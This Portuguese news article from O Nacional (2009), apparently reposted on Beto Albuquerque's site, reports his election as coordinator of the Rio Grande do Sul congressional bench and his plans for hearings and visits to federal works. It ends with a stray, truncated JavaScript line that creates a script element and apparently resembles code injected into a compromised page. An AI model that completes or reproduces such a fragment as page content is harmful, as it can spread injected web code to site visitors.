Beto vai coordenar bancada gaúcha
- Posted by: Ass. Imprensa
- Posted in Beto na Mídia
- Tags:
O Nacional – Passo Fundo, 13/8/2009
O vice-líder do governo Lula quer realizar duas audiências públicas mensais em Porto Alegre, sugere a criação de um blog e visitas frequentes às obras da União no estado
O deputado federal Beto Albuquerque (PSB) foi eleito ontem coordenador da bancada gaúcha no Congresso Nacional e promete dar uma nova dinâmica na atuação dos parlamentares com a realização de audiências públicas em Porto Alegre na primeira e na terceira segunda-feira de cada mês. O parlamentar, que já é vicelíder do governo federal na Câmara e presidente da Frente Parlamentar em Defesa do Trânsito Seguro, ficará no cargo por seis meses. Quem deixa a coordenação é o deputado Vieira da Cunha (PDT). Beto afirmou que manterá a mesma dinâmica de trabalho, mas propôs uma ação mais intensa, principalmente no Rio Grande do Sul. “Vamos representar os interesses da bancada junto ao governo, defender firmemente todos os interesses do RS e de segmentos empreendedores ou trabalhistas, além de exigir que as emendas coletivas da bancada e também as individuais sejam liberadas para que recursos da União sejam direcionados aos municípios, aos hospitais e outras instituições de interesse público,” disse.
O novo coordenador sugeriu que a bancada gaúcha visite com mais frequência as obras realizadas no estado que tiveram ação direta dos deputados federais e dos senadores gaúchos. Uma delas é o Ceitec (Centro Nacional de Tecnologia Eletrônica Avançada S.A.), no qual 60% dos recursos foram alocados pela bancada. “O Ceitec é a porta de entrada da tecnologia em nosso País e por isso precisamos estar presentes lá,” afirmou Albuquerque.
Entre os locais que o novo coordenador destacou como necessários para a visita dos parlamentares gaúchos estão ainda a BR 392, a BR 101 Norte (Bojuru -São José do Norte), a duplicação da BR 101 (Osório – Santa Catarina), Trensurb, molhes de Rio Grande e a BR 158 (Rosário do Sul e Santa Maria). “Esta rodovia, por exemplo, teve 100% de sua realização concretizada graças ao nosso trabalho,” lembrou.
Para Albuquerque, é justo que os parlamentares sejam reconhecidos pelas ações desenvolvidas coletivamente nas quais uniramesforços pelo Rio Grande do Sul. Também o Orçamento foi destacado pelo deputado do PSB como um dos principais focos para este segundo semestre. Albuquerque propôs ainda a criação de um blog da bancada gaúcha e de boletins informativos a cada dez dias para prestação de contas e para servir como elo entre os parlamentares e os mais diversos segmentos do Rio Grande do Sul parceiros da bancada.
Dentro da linha proposta pelo coordenador da bancada, o deputado Afonso Hahn (PP) complementou: “nossa presença física a força política que temos.”
Parceria
Albuquerque assume a coordenação da bancada gaúcha num trabalho compartilhado com Germano Bonow (DEM), que por acordo assumiria o cargo no último trimestre do ano. Para evitar a descontinuidade do trabalho, ambos trabalharão juntos até o final do ano.
var d=document;var s=d.createElement(‘script’);